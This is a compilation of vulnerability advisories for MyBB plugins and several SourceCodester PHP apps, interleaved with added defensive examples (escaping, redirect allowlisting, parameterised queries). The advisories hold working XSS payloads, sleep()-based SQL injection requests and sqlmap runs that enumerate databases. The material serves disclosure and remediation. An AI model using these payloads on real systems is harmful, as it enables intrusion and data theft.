<pre><code># Exploit Title: MyBB Export User Plugin 2.0 – Cross-Site Scripting<br /># Date: January 29, 2021<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=1408<br /># Version: 2.0<br /># Tested On: Windows 10<br /># CVE: CVE-2023-27890<br /><br />Description:<br />This plugin allows users to request an export of their data. XSS occurs when an admin generates the data export for the user.<br /><br />Proof of Concept:<br /><br />– As a regular user go to User CP -> Edit Profile<br />– Add a payload in Custom User Title, Location, or Bio: <script>alert(1)</script><br />– Request your data via User CP -> DSGVO data request<br />– Log in as admin; you will be notified that a user wants their data<br />– When the admin generates the user's data, the payload will execute<br /></code></pre>
<pre><code>Is there low-hanging fruit for the following observation?<br /><br />The documentation of the Python cgi module is vulnerable to XSS<br />(cross-site scripting)<br /><br />https://docs.python.org/3/library/cgi.html<br /><br />```<br />form = cgi.FieldStorage()<br />print("<p>name:", form["name"].value)<br />print("<p>addr:", form["addr"].value)<br />```<br /><br />The first result on Google for "tutorial python cgi"<br />is https://www.tutorialspoint.com/python/python_cgi_programming.htm<br /><br />and it is almost the same as the Python doc.<br /><br />I verified that setting ```name=<script>alert(document.domain)</script>```<br />will trigger a dialog, demonstrating that JavaScript is executed<br />on the cgi host.<br /><br />I would expect that devs who read the docs or tutorials will write<br />vulnerable CGIs.<br /></code></pre>
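A hardened version of the documentation snippet quoted in the post above, as an added example (this is not code from the Python docs, the tutorial, or the poster): the same two fields rendered once the way the docs do it and once through html.escape(). The SAMPLE_FORM dictionary is a constructed stand-in for cgi.FieldStorage() so the example runs without a web server, and its values are constructed test inputs.

```python
# Added example: the cgi-documentation pattern, unsafe and hardened.
# This is not the Python docs' code; the form dictionary is a constructed
# stand-in for cgi.FieldStorage() (the cgi module was removed in Python 3.13).
import html

# Constructed submissions: the first mirrors the poster's test value, the
# second shows why attribute quoting matters as well.
SAMPLE_FORM = {
    "name": "<script>alert(document.domain)</script>",
    "addr": '1 Main St" onmouseover="alert(1)',
}


def render_unsafe(form):
    """What the documentation snippet does: raw values go straight into HTML."""
    return "\n".join(f"<p>{field}: {value}" for field, value in form.items())


def render_safe(form):
    """Same output, but every value is escaped. quote=True (the default)
    also turns " and ' into entities, so the value is inert inside attributes."""
    return "\n".join(
        f"<p>{html.escape(field)}: {html.escape(value, quote=True)}"
        for field, value in form.items()
    )


def has_live_markup(rendered):
    """Check used below: does the output still contain an unescaped tag or
    an attribute boundary that the input was able to open?"""
    return "<script" in rendered.lower() or 'onmouseover="' in rendered


if __name__ == "__main__":
    print(render_unsafe(SAMPLE_FORM))
    print("---")
    print(render_safe(SAMPLE_FORM))
```

The escaped form is the fix for every HTML-body and attribute-context case on this page, including the `">` prefix used against the Active Threads date parameter: with quote=True the double quote becomes `&quot;` and cannot terminate the attribute. Values that end up inside an inline script need a different encoder, because browsers do not decode HTML entities inside `<script>`.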
<pre><code># Exploit Title: MyBB External Redirect Warning Plugin 1.3 – Cross-Site Scripting<br /># Date: February 1, 2021<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=493<br /># Version: 1.3<br /># Tested On: Windows 10<br /># CVE: CVE-2022-28353<br /><br />Description:<br />This plugin notifies the user when they are being redirected to an off-site page. The redirect URL parameter is vulnerable to XSS.<br /><br />Proof of Concept:<br /><br />– Go to the following URL… external.php?url=javascript:alert(1);<br />– Click continue<br />– The payload will execute<br /></code></pre>
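The check a redirect-warning page needs before it echoes the url parameter into its "Continue" link, as an added example (not the plugin's code): only absolute http/https URLs that name a host are accepted, so javascript: and data: targets fall back to a fixed path instead. FALLBACK_PATH, MAX_URL_LEN and the test URLs are assumptions and constructed values for this example.

```python
# Added example (not the plugin's code): validating a redirect target before it
# is echoed into the warning page's "Continue" link. Only absolute http(s) URLs
# with a host pass; javascript: and data: targets fall back to FALLBACK_PATH.
# FALLBACK_PATH and MAX_URL_LEN are assumptions for this example.
from html import escape
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
FALLBACK_PATH = "/index.php"
MAX_URL_LEN = 2048


def is_safe_external_url(raw):
    """True only for absolute http/https URLs that name a host.
    urlsplit() lower-cases the scheme, so 'JavaScript:' is caught as well."""
    if not isinstance(raw, str) or not raw or len(raw) > MAX_URL_LEN:
        return False
    # Tabs and newlines are stripped by some URL parsers and kept by others;
    # reject them so every layer sees the same scheme.
    if any(ord(ch) < 0x20 for ch in raw):
        return False
    parts = urlsplit(raw.strip())
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def continue_link(raw):
    """Return the anchor the warning page should render for the url parameter."""
    target = raw if is_safe_external_url(raw) else FALLBACK_PATH
    return f'<a href="{escape(target, quote=True)}">Continue</a>'


if __name__ == "__main__":
    for candidate in ("https://example.org/", "javascript:alert(1);", "//evil.example"):
        print(candidate, "->", continue_link(candidate))
```

Allowlisting the scheme is the part that matters: escaping the value for the href attribute stops markup injection but does nothing about a `javascript:` URL, which is a perfectly well-formed attribute value that the browser executes on click.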
<pre><code># Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting<br /># Date: February 9, 2022<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=1336<br /># Version: 1.3.0<br /># Tested On: Windows 10<br /># CVE: CVE-2022-28354<br /><br />Description:<br />This plugin shows a page of active threads. The date parameter is vulnerable to XSS when a time period is set.<br /><br />Proof of Concept:<br />activethreads.php?days=7&hours=0&mins=0&date="><script>alert(1)</script><br /></code></pre>
<pre><code># Exploit Title: 101+ News Portal - SQLi<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A Blind SQL injection vulnerability in the search page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute arbitrary SQL commands through the "searchtitle" parameter. <br /><br />## Request PoC<br />```<br />POST /101news/search.php HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/101news/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 59<br />Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9<br /><br />searchtitle=232943'<br /><br />```<br /><br />This request causes an error. After appending "'%2b(select*from(select(sleep(20)))a)%2b'" to the "searchtitle" parameter, the response still had status 200 OK but arrived 20 seconds later, which indicates that the injected sleep(20) was executed. 
<br /><br />```<br />POST /101news/search.php HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/101news/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 59<br />Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9<br /><br />searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'<br /><br />```<br /><br />## Exploit with sqlmap<br />Save the request from burp to file <br />```<br />┌──(root㉿caesar)-[/home/kali/Workstation/multi]<br />└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2 <br />---snip---<br />POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:<br />---<br />Parameter: searchtitle (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- -<br />---<br />[18:01:02] [INFO] the back-end DBMS is MySQL<br />web application technology: PHP 8.2.0, Apache 2.4.54<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br 
/>[18:01:02] [INFO] fetching database names<br />available databases [5]:<br />[*] information_schema<br />[*] mysql<br />[*] newsportal<br />[*] performance_schema<br />[*] phpmyadmin<br />---snip---<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Music Gallery Site - Cross Site Scripting Vulnerability (Authenticated)<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A reflected Cross Site Scripting vulnerability in the "page" parameter in Music Gallery Site allows remote authenticated users to execute JavaScript code. <br /><br />## Request PoC<br />```<br />GET /php-music/admin/?page=musics63401'%3balert(1)%2f%2f399 HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-music/admin/<br />Cookie: PHPSESSID=05o776i4lcn4nm1h48he29gd9b<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Medicine Tracker System - Cross Site Scripting Vulnerability<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A reflected Cross Site Scripting vulnerability in the "page" parameter in Medicine Tracker System allows JavaScript code to be executed. <br /><br />## Request PoC<br />```<br />GET /php-mts/?page=about%3cscript%3ealert(1)%3c%2fscript%3e HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-mts/<br />Cookie: PHPSESSID=9gruivatbrq61qio77q3p7j77a<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Yoga Class Registration System - Cross Site Scripting Vulnerability (Authenticated)<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A reflected Cross Site Scripting vulnerability in the "page" parameter in Yoga Class Registration System allows remote authenticated users to execute JavaScript code. <br /><br />## Request PoC<br />```<br />GET /php-ycrs/admin/?page=classes%2fmanage_class58913'%3balert(1)%2f%2f575&id=2 HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-ycrs/admin/?page=classes<br />Cookie: PHPSESSID=intlfrkii1gsh9pjgeoo0dhu3b<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump the database through arbitrary SQL commands injected via the "id" parameter. <br /><br />## Request PoC<br />```<br />GET /php-opos/index.php?page=category&id=1' HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-opos/<br />Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20<br /><br />```<br /><br />This request causes a Fatal Error in the web app. After appending "'%2b(select*from(select(sleep(20)))a)%2b'" to the "id" parameter, the response still had status 200 OK but arrived 20 seconds later, which indicates that the injected sleep(20) was executed. 
<br /><br />```<br />GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-opos/<br />Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20<br /><br />```<br /><br />## Exploit with sqlmap<br />Save the request from burp to file <br />```<br />┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]<br />└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2<br />---snip---<br />[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable<br />GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=category&id=1' AND 9957=9957-- dMoW<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 2 columns<br /> Payload: page=category&id=-1987' UNION ALL SELECT 
NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- -<br />---<br />[13:20:45] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.54, PHP 8.2.0<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[13:20:45] [INFO] fetching database names<br />[13:20:45] [INFO] retrieved: 'information_schema'<br />[13:20:46] [INFO] retrieved: 'mysql'<br />[13:20:46] [INFO] retrieved: 'opos_db'<br />[13:20:46] [INFO] retrieved: 'performance_schema'<br />[13:20:46] [INFO] retrieved: 'phpmyadmin'<br />----snip----<br />```<br /></code></pre>
<pre><code># Exploit Title: Human Resources Management System - HRM - Multiple SQLi<br /># Date: 16/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip<br /># Version: 1.0<br /># Tested on: Windows<br /><br />## Description <br />A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute arbitrary SQL commands through the "name" parameter. <br /><br />## Request PoC<br />```<br />POST /hrm/controller/login.php HTTP/1.1<br />Host: 192.168.1.103<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.103/hrm/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 73<br /><br />name=test@testdomain.com'&password=test&submit=Sign+In<br /><br />```<br /><br />This request causes an error. After appending "'%2b(select*from(select(sleep(20)))a)%2b'" to the "name" parameter, the response still had status 302 Found but arrived 20 seconds later, which indicates that the injected sleep(20) was executed. 
<br /><br />```<br />POST /hrm/controller/login.php HTTP/1.1<br />Host: 192.168.1.103<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.103/hrm/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 114<br /><br />name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In<br /><br />```<br /><br />## Exploit with sqlmap<br />Save the request from burp to file <br />```<br />┌──(root㉿caesar)-[/home/kali/Workstation/hrm]<br />└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2<br />---snip----<br />[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'<br />POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:<br />---<br />Parameter: name (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- 
fhJt&password=a5P!s3v!K8&submit=Sign In<br />---<br />[15:49:36] [INFO] the back-end DBMS is MySQL<br />web application technology: PHP 8.2.0, Apache 2.4.54, PHP<br />----snip----<br /><br />```<br /><br /><br />## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.<br /></code></pre>
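The sleep()-based probes in the 101+ News Portal, Online Pizza Ordering and HRM reports above all work for the same reason: the request parameter is concatenated into the SQL text, so a lone quote breaks the statement (the error each report starts from) and a crafted value becomes executable SQL. Below is an added example (not code from any of those applications) contrasting a string-built query with a parameterised one over a constructed in-memory SQLite table; the table and column names are invented stand-ins, not the applications' schemas.

```python
# Added example (not code from any of the reported applications): the same
# search implemented by string concatenation and by parameter binding, run
# against a constructed in-memory SQLite table. Table and column names are
# invented stand-ins, not the applications' schemas.
import sqlite3

SAMPLE_ROWS = [
    ("Local election results", "politics"),
    ("Weather warning issued", "weather"),
]


def make_db():
    """Build the constructed table the two search variants run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, category TEXT)")
    conn.executemany("INSERT INTO posts (title, category) VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_unsafe(conn, term):
    """The vulnerable shape: user input becomes SQL syntax."""
    sql = "SELECT title FROM posts WHERE title LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Parameter binding: the driver sends the value separately from the SQL
    text, so quotes, sleep() and UNION in the term are just characters."""
    sql = "SELECT title FROM posts WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def probe(conn, term):
    """Run both variants on one term. 'unsafe' is the row list, or the name of
    the exception the string-built query raised (the error the reports trigger
    with a lone quote)."""
    try:
        unsafe = search_unsafe(conn, term)
    except sqlite3.Error as exc:
        unsafe = type(exc).__name__
    return {"unsafe": unsafe, "safe": search_safe(conn, term)}


if __name__ == "__main__":
    db = make_db()
    for term in ("election", "232943'", "' OR '1'='1"):
        print(repr(term), probe(db, term))
```

The PHP equivalent for the reported applications is a prepared statement with bound parameters (PDO::prepare with bindValue or mysqli_stmt_bind_param) in place of interpolating $_GET and $_POST values into the query string. On the detection side, the probes these reports use are easy to see in access logs: a request whose response time jumps by exactly the sleep() argument, or a parameter containing sleep(, UNION or a bare quote, is worth alerting on even before the application is patched.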